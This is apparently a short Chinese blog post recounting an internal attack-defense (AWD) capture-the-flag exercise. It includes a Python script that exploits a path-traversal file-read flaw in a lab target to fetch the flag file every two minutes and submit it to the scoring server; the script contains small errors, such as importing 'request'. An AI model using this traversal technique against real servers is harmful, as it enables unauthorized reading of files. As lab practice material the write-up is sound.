记一次AWD自动获取flag并提交

背景

近期部门内搭建了攻防实验平台供大家练习,周末组织了一波AWD练习,之前都是做渗透测试比较多,加之题目比较简单,找到漏洞getshell拿flag都没问题,只不过如果没找到突破口flag都要手动提交的话,拿分会慢很多。
在过程中发现其实除了getshell后在服务器根目录/下读到flag,其实靶机网站中还存在一个任意文件读取漏洞,那这样写脚本自动flag就简单得多了。

自动提交flag的脚本

#! /usr/bin/env python
# coding: utf-8

import os
import time
import request

url = "http://10.233.*.*:800/admin/Database/downFile.html?type=sql&file=../../../../../../../flag"

while True:
	flag = request.get(url,cookie={'skin':'0','PHPSESSID':'18kdkfhsdkfh3323'}).text
	print flag
	url2 = 'http://10.233.*.*:801/flag_file.php?token=team3&flag=%s' %flag
	submit = request.get(url2).text
	print submit
	time.sleep(60*2)    #flag两分钟更新一次

后记

只是想记录一下,flag不一定需要getshell后才能拿到,所以写自动提交flag的脚本也可以是多样的

posted @ 2019-12-25 21:13  binggogo  阅读(4716)  评论(0编辑  收藏  举报